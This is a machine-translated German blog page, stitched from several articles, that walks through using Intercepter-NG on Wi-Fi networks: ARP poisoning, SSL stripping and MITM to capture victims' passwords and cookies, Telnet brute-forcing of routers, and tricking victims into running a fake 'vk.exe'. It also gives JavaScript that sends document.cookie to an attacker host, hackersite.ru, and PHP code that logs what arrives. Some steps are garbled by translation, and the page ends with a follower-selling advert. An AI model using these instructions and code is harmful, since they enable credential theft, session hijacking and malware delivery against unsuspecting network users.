Wahl der Leser
Populäre Artikel
Hallo Freunde.
Wie versprochen fahre ich mit dem Intercepter-ng-Programm fort.
Heute gibt es einen Rückblick in die Praxis.
Warnung: Sie sollten keine Einstellungen ändern oder gedankenlos auf Einstellungen drücken. Im besten Fall funktioniert es einfach nicht oder Sie schalten WLAN aus. Ich hatte einen Fall, in dem die Routereinstellungen zurückgesetzt wurden. Denken Sie also nicht, dass alles harmlos ist.
Und selbst mit den gleichen Einstellungen wie bei mir heißt das nicht, dass alles reibungslos funktioniert. In schwerwiegenden Fällen müssen Sie auf jeden Fall die Funktionsweise aller Protokolle und Modi studieren.
Lass uns anfangen?
Beginnen wir mit dem klassischen Abfangen von Passwörtern und Cookies. Im Prinzip ist der Vorgang derselbe wie im Artikel „Passwörter über WLAN abfangen“ und „Cookies über WLAN abfangen“, aber ich werde ihn mit Klarstellungen noch einmal umschreiben.
Übrigens können Antivirenprogramme oft solche Dinge auslösen und das Abfangen von Daten über WLAN verhindern
Befindet sich das Opfer auf einem Android- oder IOS-Gerät, können Sie sich nur mit dem zufrieden geben, was das Opfer nur im Browser eingibt (Passwörter, Websites, Cookies). Wenn das Opfer einen sozialen Client für VK verwendet, treten einfach Probleme auf aufhören zu arbeiten. In der neuesten Version von Intercepter NG können Sie das Problem lösen, indem Sie das Zertifikat des Opfers ersetzen. Mehr dazu später.
Entscheiden Sie zunächst, was Sie vom Opfer bekommen möchten. Vielleicht benötigen Sie Passwörter für soziale Netzwerke oder einfach nur für Websites. Möglicherweise reichen die Cookies aus, um sich als Opfer anzumelden und sofort etwas zu unternehmen, oder Sie benötigen Passwörter zum späteren Speichern. Müssen Sie die vom Opfer angesehenen Bilder und einige Seiten weiter analysieren, oder brauchen Sie diesen Müll nicht? Wissen Sie, dass das Opfer die Website bereits betreten hat (bei der Übergabe bereits autorisiert) oder wird es einfach nur seine Daten eingeben?
Wenn es nicht erforderlich ist, Bilder von den von Ihnen besuchten Ressourcen oder Teile von Mediendateien zu empfangen und einige in einer HTML-Datei gespeicherte Websites anzuzeigen, deaktivieren Sie dies in den Einstellungen – Ressurection. Dadurch wird die Belastung des Routers etwas reduziert.
Was kann in den Einstellungen aktiviert werden – wenn Sie über ein Ethernet-Kabel verbunden sind, müssen Sie Spoof Ip/mac aktivieren. Aktivieren Sie außerdem den Cookie-Killer (hilft, Cookies zurückzusetzen, damit das Opfer die Website verlassen kann). Cookie-Killer ist ein SSL-Strip-Angriff, vergessen Sie also nicht, ihn zu aktivieren.
Es ist auch besser, wenn der Promiscious-Modus aktiviert ist, der es Ihnen ermöglicht, das Abfangen zu verbessern, aber nicht alle Module unterstützen ihn... Der Extreme-Modus kann auch ohne durchgeführt werden. Damit werden manchmal mehr Ports abgefangen, aber es gibt auch zusätzliche Informationen + Last...
Wählen Sie zunächst oben die Schnittstelle aus, über die Sie mit dem Internet verbunden sind, und den Verbindungstyp: WLAN oder Ethernet, wenn die Verbindung über ein Kabel mit dem Router erfolgt.
Klicken Sie im Scanmodus mit der rechten Maustaste auf ein leeres Feld und klicken Sie auf Smart Scan. Alle Geräte im Netzwerk werden gescannt; es müssen nur noch die gewünschten Opfer unter Add nat hinzugefügt werden.
Oder Sie können eine beliebige IP festlegen, in die Einstellungen gehen – Expertenmodus und das Kontrollkästchen für Auto ARP Poison aktivieren. In diesem Fall fügt das Programm alle verbundenen Personen hinzu und stellt eine Verbindung zum Netzwerk her.
Wir müssen lediglich in den Nat-Modus wechseln.
Klicken Sie auf „Mitms konfigurieren“. Hier benötigen wir SSL-Mitm und SSL-Strip.
SSL mitm ermöglicht das Abfangen von Daten, obwohl viele Browser auch darauf reagieren, indem sie das Opfer warnen.
SSL-Streifen Ermöglicht dem Opfer den Wechsel vom sicheren HTTPS-Protokoll zu HTTP und sorgt dafür, dass der Cookie-Killer funktioniert.
Wir brauchen nichts anderes, klicken Sie auf „Arp-Gift starten“ (Strahlungssymbol) und warten Sie auf die Aktivität des Opfers.
Klicken Sie im Abschnitt „Passwortmodus“ mit der rechten Maustaste und zeigen Sie Coolies an. Dann können Sie mit der rechten Maustaste auf das Cookie klicken und zur vollständigen URL gehen.
Wenn sich das Opfer übrigens in sozialen Netzwerken aufhält, besteht die Möglichkeit, dass seine aktive Korrespondenz im Messenger-Modus angezeigt wird.
Mmm, eine ziemlich süße Option.
Sie können es dem Opfer zustecken, damit es die Datei herunterlädt. Wir können nur hoffen, dass das Opfer die Datei startet. Zur Plausibilität können Sie analysieren, welche Seiten das Opfer besucht, und so etwas wie ein Update einschleusen.
Wenn das Opfer beispielsweise VK verwendet, nennen Sie die Datei vk.exe. Vielleicht startet das Opfer es und entscheidet, dass es nützlich ist.
Lass uns anfangen.
Brute-Force- und Passwort-Ratemodus.
Eine Möglichkeit, es zu nutzen, ist der brutale Zugriff auf das Admin-Panel des Routers. Auch einige andere Protokolle.
Für Brutus brauchst du
Geben Sie im Zielserver die IP des Routers, das Telnet-Protokoll und den Benutzernamen ein – Benutzername, in unserem Fall Admin.
Unten befindet sich eine Schaltfläche mit einem darauf gezeichneten Ordner, Sie klicken darauf und öffnen eine Liste mit Passwörtern (im Ordner mit dem Programm, misc/pwlist.txt, befindet sich eine Liste häufig verwendeter Passwörter, oder Sie können verwenden Ihre eigene Liste).
Drücken Sie nach dem Laden Start (Dreieck) und gehen Sie Tee trinken.
Bei Übereinstimmungen (ein Passwort ist ausgewählt) wird das Programm beendet.
Sie müssen den Benutzernamen kennen. Wenn Sie jedoch auf den Router zugreifen möchten, versuchen Sie es mit dem Standard-Administrator.
Wie man Brute produziert.
Verkehrswechsler (Verkehrsersatz).
Die Funktion ist eher ein Witz. Sie können es so ändern, dass das Opfer beim Betreten einer Site zu einer anderen wechselt, die Sie betreten.
Geben Sie im Verkehrsmodus links die Anfrage ein, rechts das Ergebnis, jedoch mit der gleichen Anzahl an Buchstaben und Symbolen, sonst funktioniert es nicht.
Beispiel – links geben wir die zu ändernde Abfrage ein, rechts ändern wir test1 in test2. (aktivieren Sie das Kontrollkästchen für HTTP-gzip deaktivieren).
Drücken Sie nach der Eingabe ADD und dann OK.
Zum Schluss noch ein Video zum Abfangen von Daten von iOS-Clients, denn wie Sie wissen, funktionieren deren Anwendungen bei einem Mitm-Angriff einfach nicht mehr.
Ich werde bald ein Video über den Inhalt des Artikels machen.
Es handelte sich um Datenabfang über WLAN.
Das ist es im Grunde. Wenn Sie etwas hinzufügen möchten, schreiben Sie, wenn Sie etwas korrigieren möchten, schreiben Sie einfach.
Bis zum nächsten Mal.
Was ist ein Cookie?
Es gibt einen Mechanismus, der es dem HTTP-Server ermöglicht, einige Textinformationen auf dem Computer des Benutzers zu speichern und dann darauf zuzugreifen. Diese Informationen werden als Cookie bezeichnet. Im Wesentlichen ist jedes Cookie ein Paar: der Name eines Parameters und sein Wert. Jedem Cookie wird außerdem die Domain zugeordnet, zu der es gehört. Aus Sicherheitsgründen darf der http-Server in allen Browsern nur auf das Cookie seiner Domain zugreifen. Darüber hinaus können Cookies ein Ablaufdatum haben. In diesem Fall bleiben sie bis zu diesem Datum auf dem Computer gespeichert, auch wenn Sie alle Browserfenster schließen.
Alle Mehrbenutzersysteme verwenden Cookies zur Identifizierung des Benutzers. Genauer gesagt, die aktuelle Verbindung des Benutzers zum Dienst, Benutzersitzung. Wenn jemand Ihre Cookies erkennt, kann er sich in Ihrem Namen beim System anmelden. Denn derzeit prüfen nur sehr wenige Internetressourcen während einer Benutzersitzung, ob sich die IP-Adresse ändert.
Browserentwickler stellen keine integrierten Tools zum Bearbeiten von Cookies zur Verfügung. Sie können aber auch mit einem normalen Notizblock auskommen.
Windows-Registrierungseditor Version 5.00
@="C:\\IE_ext.htm"
Speichern Sie es unter dem Namen IE_ext.reg
Schritt 2: Fügen Sie mithilfe der erstellten Datei Änderungen zur Windows-Registrierung hinzu.
Schritt 3: Erstellen Sie eine Textdatei mit Text
<
script
language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);
external.menuArguments.document.cookie= „testname=testvalue; path=/; domain=testdomain.ru“;
Alert(external.menuArguments.document.cookie);
script >
Schritt 4: Wir gehen auf die Website, die uns interessiert.
Schritt 5: Klicken Sie mit der rechten Maustaste auf eine leere Stelle auf der Seite und wählen Sie den Menüpunkt aus „Arbeiten mit Cookies“. Erlauben Sie den Zugriff auf die Zwischenablage. Ihre Cookies von dieser Website werden in die Zwischenablage verschoben. Sie können ihren Notizblock einlegen und einen Blick darauf werfen.
Schritt 6: Um einige Cookies zu ändern, bearbeiten Sie die Datei C:\IE_ext.htm und ersetzen Sie sie Testname im Namen von Cookie, Testwert- über seine Bedeutung, testdomain.ru– zur Site-Domain. Fügen Sie bei Bedarf weitere ähnliche Zeilen hinzu. Zur einfacheren Kontrolle habe ich dem Skript die Ausgabe der aktuellen Cookies vor und nach der Änderung hinzugefügt: Alert(external.menuArguments.document.cookie);
Schritt 7: Führen Sie Schritt 5 erneut aus und aktualisieren Sie dann die Seite.
Fazit: Wir werden mit aktualisierten Cookies auf diese Internetressource zugreifen.
Wie stiehlt man Cookies mit JavaScript?
Gelingt es einem Angreifer, ein beliebiges JavaScript-Skript auf dem Computer des Opfers auszuführen, kann er die aktuellen Cookies sehr einfach auslesen. Beispiel:
var str= document.cookie;
Aber wird er sie auf seine Website übertragen können, da, wie ich bereits erwähnt habe, ein JavaScript-Skript ohne zusätzliche Bestätigung nicht auf eine Website zugreifen kann, die sich auf einer anderen Domain befindet? Es stellt sich heraus, dass ein JavaScript-Skript jedes Bild laden kann, das sich auf einem beliebigen http-Server befindet. Übertragen Sie gleichzeitig eventuelle Textinformationen der Download-Anfrage auf dieses Bild. Beispiel: http://hackersite.ru/xss.jpg?text_info Wenn Sie also diesen Code ausführen:
var img= neues Bild();
img.src= „http://hackersite.ru/xss.jpg?“+ encodeURI(document.cookie);
Wie gehe ich mit solchen Anfragen um, ein „Bild“ herunterzuladen?
Ein Angreifer muss lediglich ein Hosting mit PHP-Unterstützung finden und dort Code wie diesen platzieren:
$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>
Dann werden alle Anfrageparameter für dieses Skript in der Datei gespeichert log.txt. Es bleibt nur noch das zuvor beschriebene JavaScript-Skript zu ersetzen http://hackersite.ru/xss.jpg zum Pfad zu diesem PHP-Skript.
Ich habe nur die einfachste Möglichkeit gezeigt, XSS-Schwachstellen auszunutzen. Dies beweist jedoch, dass das Vorhandensein mindestens einer solchen Sicherheitslücke auf einer Mehrbenutzer-Internetseite es einem Angreifer ermöglichen kann, deren Ressourcen in Ihrem Namen zu nutzen.
Über die Gefahren offener WLAN-Zugangspunkte, darüber, wie Passwörter abgefangen werden können.
Heute schauen wir uns das Abfangen von Passwörtern über WLAN und das Abfangen von Cookies über WLAN mit dem Programm an.
Der Angriff wird aufgrund von stattfinden Schnüffeln.
Schnüffeln– Sniff bedeutet übersetzt „Schnüffeln“. Mit Sniffing können Sie die Netzwerkaktivität im Internet analysieren, sehen, welche Seiten der Benutzer besucht, und Passwörter abfangen. Es kann aber auch für nützliche Zwecke verwendet werden, um Viren abzuhören, die beliebige Daten ins Internet senden.
Die Methode, die ich zeigen werde, ist ziemlich primitiv und einfach. Tatsächlich können Sie das Programm stärker nutzen.
Offizielle Website des Programms sniff.su (kopieren Sie den Link und öffnen Sie ihn in einem neuen Tab), Sie können ihn im Abschnitt herunterladen "Herunterladen".
Es gibt eine Version für Windows, Unix-Systeme und für Android.
Wir werden Windows in Betracht ziehen, da dies das beliebteste System ist und das Programm hier am fortschrittlichsten ist.
Ihr Browser oder Ihr Antivirenprogramm beschwert sich möglicherweise darüber, dass das Programm gefährlich ist, aber Sie selbst verstehen, dass es sich um ein Hackprogramm handelt und dass es immer auf solche Hacks reagiert.
Das Programm wird in einem Zip-Archiv heruntergeladen. Sie müssen das Programm nur in einen Ordner entpacken und verwenden, es ist keine Installation erforderlich.
Das Programm ist in der Lage, verschiedene Mitm-Angriffe auf Wi-Fi-Netzwerke zu organisieren.
Der Artikel wurde ausschließlich zu Informationszwecken verfasst, um anhand eines Beispiels die Gefahren offener WLAN-Hotspots aufzuzeigen; alle angegebenen Aktionen erfolgen auf eigene Gefahr und Gefahr. Und ich möchte Sie an die strafrechtliche Verantwortlichkeit für den Schutz der Daten anderer Personen erinnern.
Service avi1 bietet atemberaubend günstige Preise für die Möglichkeit, Abonnenten für Ihr Instagram-Profil zu bestellen. Erzielen Sie sofort und ohne großen Aufwand und Zeitaufwand eine höhere Online-Popularität oder einen höheren Umsatz.
Arbeiten mit dem Intercepter NG-Programm
Das Programm wird also über Intercepter-NG.exe gestartet.
Das Programm hat eine englische Benutzeroberfläche, aber wenn Sie ein sicherer Computerbenutzer sind, werden Sie es meiner Meinung nach verstehen.
Nachfolgend finden Sie ein Video zur Einrichtung (für diejenigen, die lieber zuschauen als lesen).
— Wählen Sie oben das gewünschte Netzwerk aus, wenn Sie mehrere davon haben.
— Wechseln Sie den Typ Ethernet/WLAN Wenn Sie über WLAN verfügen, müssen Sie das WLAN-Symbol (links neben der Netzwerkauswahl) auswählen.
- Drücken Sie den Knopf Scan-Modus(Radarsymbol)
— Klicken Sie mit der rechten Maustaste in ein leeres Feld und klicken Sie auf das Kontextmenü Intelligente Suche
— Alle mit dem Netzwerk verbundenen Geräte werden angezeigt
— Wählen Sie das Opfer aus (Sie können alle auswählen, während Sie die Umschalttaste gedrückt halten), markieren Sie jedoch nicht den Router selbst, seine IP lautet normalerweise 192.168.1.1
- Klicken Sie nach der Auswahl mit der rechten Maustaste und klicken Sie Zu Nat hinzufügen
- Gehen Sie zur Registerkarte Nat
- IN Stealth-IP Es ist ratsam, die letzte Ziffer durch eine freie zu ersetzen, da dadurch Ihre tatsächliche IP-Adresse verborgen bleibt.
- Setzen Sie ein Häkchen SSL-Streifen Und SSL-Mitm.
- Klicken Einstellungen(Zahnräder rechts).
- Setzen Sie ein Häkchen Auferstehung(Dadurch können Sie Passwörter und Cookies des verschlüsselten HTTPS-Protokolls abfangen) und entfernen IP/Mac fälschen. Sie können das Kontrollkästchen aktivieren Kekskiller Dadurch wird das Opfer von der aktuellen Seite, beispielsweise einem sozialen Netzwerk, ausgeschlossen, und das Opfer muss das Passwort erneut eingeben, und wir werden es abfangen. Vergleichen Sie die Einstellungen mit dem Bild.
— Hier ist die Einrichtung abgeschlossen, schließen Sie die Einstellungen mit einem Häkchen.
— Die Einrichtung ist abgeschlossen, Sie können mit dem Angriff beginnen.
— Drücken Sie die Taste oben Mit dem Schnüffeln beginnen/aufhören(Dreieck), klicken Sie im selben Fenster unten auf das Strahlungssymbol ARP-Gift starten/stoppen
— Gehen Sie zur Registerkarte Passwortmodus und klicken Sie mit der rechten Maustaste in das Fenster und wählen Sie aus Cookies anzeigen(„Dadurch können von Opfern eingegebene Cookies und Passwörter angezeigt werden“)
Das war's, wir warten darauf, dass jemand das Passwort eingibt.
Manchmal kommt es vor, dass das Internet nicht mehr funktioniert. Versuchen Sie, selbst auf das Internet zuzugreifen. Wenn es nicht funktioniert, starten Sie das Programm neu.
Mir ist aufgefallen, dass es nicht immer möglich ist, ein Passwort abzufangen, aber tatsächlich funktioniert es fast fehlerfrei.
Das ist alles, wir haben uns das Abfangen von Passwörtern über WLAN und das Abfangen von Cookies über WLAN angesehen.
Passen Sie auf sich auf
In Verbindung stehende Artikel: | |
Eine einfache Möglichkeit, Kekse zu stehlen
Intercepter ist ein multifunktionales Networking-Tool, das... So installieren Sie Google-Dienste nach dem Flashen
Müssen wir Besitzern von Android-Geräten erklären, was... Das umwerfende Samsung Galaxy Z (2018) ist viel besser als jedes andere Smartphone der Welt
Lieferumfang Smartphone-Akku Li-Ion 2600 mAh Ladegerät... |